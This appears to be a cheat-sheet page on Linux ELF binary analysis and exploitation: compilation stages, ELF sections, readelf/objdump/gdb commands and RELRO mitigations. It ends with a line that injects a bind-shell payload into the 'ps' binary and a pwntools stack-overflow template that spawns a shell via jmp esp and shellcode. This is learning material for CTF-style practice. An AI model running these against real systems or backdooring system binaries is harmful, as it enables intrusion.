[linux] binary analysis & pwn
Intro
Resources
Compact ASCII tables
Example Reference Code
{% highlight c hl_lines=“1 3 4” %} #include <stdio.h>
#define FORMAT_STRING “%s” #define MESSAGE “Hello Pizza!\n”
int main(int argc, char *argv[]) { printf(FORMAT_STRING, MESSAGE); return 0; } {% endhighlight %}
Compilation Steps
PREPROCESSING -> COMPILING -> ASSEMBLING -> LINKING
-
C Preprocessing - will stop earlier and print macros and includes
$ gcc -E -P <source_file>.c > <preprocessing_output>.i
-
Compilation - will generate assembly code (intel syntax)
$ gcc -S -masm=intel <source_file>.c
-
Assembler # will generate an object file (machine code)
$ gcc -c <source_file>.c
-
Linking - incorporates all object files and static libraries in a single binary
$ gcc <source_file>.c
Resulting files
<filename>.i ; preprocessed source
<filename>.s ; assembly code
<filename>.o ; object file
<filename>.out ; binary executable
ELF Sections
.init Performs initialization tasks and it’s the first code to run at startup before jumping to the main entry point.
.fini Same purpose as .init but runs when the program terminates.
.text It contains the main program code. This section is executable but not writable.
.rodata It stores strings constants and is read-only.
.data It stores default values of initialized values and it is writable.
.bss It stores uninitialized variables and it is writable.
.got GOT, or Global Offset Table. It holds relocations regarding global variables, which are resolved once, at runtime.
.got.plt It holds relocations about functions absolute addresses and works together with .plt when resolving those references. It is similar to the regular .got, and historically they were the same and has been introduced to mitigate the security weakness of having .got runtime-writable. However .got.plt can be also be runtime-writable when partial-RELRO is enabled and runtime-readonly when full-RELRO is enabled. More information here
.plt PLT, or Procedure Linkage Table. It consists of stubs of a well-defined format, made for directing calls from the .text section to the appropriate invoked library location.
.plt.got This alternative PLT is used when full-RERLO is enabled with the ld option -z now at compile time, telling the dynamic linker that you want to use “now binding.”
.rel Contains information used by the linker when doing static or dynamic relocations.
.dynamic It tells the OS and dynamic linker how to load and set up the binary.
.init_array Contains pointers to functions constructors used during startup (formerly known as .ctors).
.fini_array Contains pointers to functions deconstructors used during (formerly known as .dtors).
ELF static analysis
ELF header
- dump ELF’s header
$readelf -h <filename>
Symbols
-
non stripped binary
$ readelf --syms <filename>.out
-
stripping symbols from a binary
$ strip --strip-all <filename>.out
$ readelf --syms <filename>.out
Sections
-
dump all ELF’s sections information
$readelf --sections --wide <filename>.out
-
dump the .plt section
$ objdump -M intel --section .plt -d <filename>.out
-
dump the relocs
$ readelf --relocs <filename>.out
Program headers
- dump all ELF’s program headers information
$ readelf --segments --wide <filename>.out
Binary Inspection/Forensic
- Check magic bytes to obtain file type
$ file <filename>
- base64 decode
$ base64 -d <encoded_file> > <decoded_file>
- uncompress preview
$ file -z <compressed_file>
- uncompress file
$ tar xvzf <compressed_file>
- find library dependencies
$ ldd <filename>
- dump hex first 128 bytes
$ xxd -l 128 <filename>
- dump binary first 128 bytesr
$ xxd -b -l 128 <filename>
- dump c-style header first 128 bytes at a 256-bytes offset
$ xxd -i -s 256 -l 128 <filename>
- extract 64-bytes long ELF header residing 52 bytes after start, 1 byte a time time
$ dd skip=52 count=64 if=<input_filename> of=<output_filename> bs=1
- Calculate total binary file given ELF header only
total_size = elf_section_header_offset + (elf_section_headers_count * elf_section_header_size)
- List symbols from object file
$ nm <filename>
- List and demangle dynamic symbols from stripped object file
$ nm -D --demangle <filename>
- Add current path to the linker environment
$ export LD_LIBRARY_PATH=`pwd`
- Trace system calls
$ strace <filename>`
- Trace library calls while demangling C++ functions and printing EIP
$ ltrace -i -C <filename>`
Disassembling
- simple disassembly of an object file
$ objdump -M intel -d <filename>.o
- check relocations inside the object file
$ readelf --relocs compilation_example.o
- full binary disassembly
$ objdump -M intel -d <filename>.out
ELF dynamic analysis
GDB
- Set a breakpoint
(gdb) b *0x[address]
- Show the registers
(gdb) info registers [specific register]
- Dump a string at memory address
(gdb) x/s 0x[memory_address]
- Dump a four hex words at memory address
(gdb) x/4xw 0x[memory_address]
Mitigations
Compile-time
- Partial RELRO
gcc -g -Wl,-z,relro -o test testcase.c
- Full RELRO
gcc -g -Wl,-z,relro,-z,now -o test testcase.c
Verify mitigations
- Download checksec [here] (https://github.com/slimm609/checksec.sh)
checksec.sh --file [filename]
example output
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH 8 Symbols No 0 0 start
Binary Injection
- Assemble a raw binary (removing any ELF overhead and leaving just the code)
nasm -f bin -o test.bin test.s
- Inject shellcode into an ELF
elfinject ps bindshell.bin ".injected" 0x800000 -1
PWN
Shellcode x86 compilation (NASM)
- Assemble
nasm -f elf32 -o shellcode.o shellcode.nasm
- Link
ld -m elf_i386 -z execstack -o shellcode shellcode.o
pwntools
asm
$ asm nop
90
$ asm 'mov eax, 0xdeadbeef'
b8efbeadde
disasm
$ asm 'push eax' | disasm
0: 50 push eax
$ asm -c arm 'bx lr' | disasm -c arm
0: e12fff1e bx lr
templates
start
from pwn import *
context.arch = "amd64"
r = process("./filename")
# r = remote("127.0.0.1", 8888)
r.interactive()
basic bof
# Import everything in the pwntools namespace
from pwn import *
# Create an instance of the process to talk to
io = gdb.debug('./challenge')
# Attach a debugger to the process so that we can step through
pause()
# Load a copy of the binary so that we can find a JMP ESP
binary = ELF('./challenge')
# Assemble the byte sequence for 'jmp esp' so we can search for it
jmp_esp = asm('jmp esp')
jmp_esp = binary.search(jmp_esp).next()
log.info("Found jmp esp at %#x" % jmp_esp)
# Overflow the buffer with a cyclic pattern to make it easy to find offsets
#
# If we let the program crash with just the pattern as input, the register
# state will look something like this:
#
# EBP 0x6161616b ('kaaa')
# *ESP 0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...'
# *EIP 0x6161616c ('laaa')
crash = False
if crash:
pattern = cyclic(512)
io.sendline(pattern)
pause()
sys.exit()
# Fill out the buffer until where we control EIP
exploit = cyclic(cyclic_find(0x6161616c))
# Fill the spot we control EIP with a 'jmp esp'
exploit += pack(jmp_esp)
# Add our shellcode
exploit += asm(shellcraft.sh())
# gets() waits for a newline
io.sendline(exploit)
# Enjoy our shell
io.interactive()